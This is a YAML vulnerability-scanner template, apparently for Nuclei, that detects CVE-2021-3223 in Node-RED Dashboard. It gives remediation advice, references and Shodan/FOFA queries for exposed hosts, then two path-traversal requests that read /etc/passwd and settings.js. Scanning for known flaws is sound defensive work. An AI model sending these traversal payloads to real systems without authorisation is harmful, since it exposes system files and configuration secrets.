id: CVE-2021-3223

info:
  name: Node RED Dashboard <2.26.2 - Local File Inclusion
  author: gy741,pikpikcu
  severity: high
  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
  remediation: |
    Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.
  reference:
    - https://github.com/node-red/node-red-dashboard/issues/669
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3223
    cwe-id: CWE-22
    epss-score: 0.11532
    epss-percentile: 0.94684
    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nodered
    product: node-red-dashboard
    framework: node.js
    shodan-query: title:"Node-RED"
    fofa-query: title="Node-RED"
  tags: cve,cve2021,node-red-dashboard,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED web server is listening"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402202e9724b5de55a2645274dd7e13367a2efbd8c60679ac00089a184aec8090ddca0220562846065a2fb3ec5cfcdd988b4bad30589d3c9529be7ed908122b60935c4e84:922c64590222798bb761d5b6d8e72950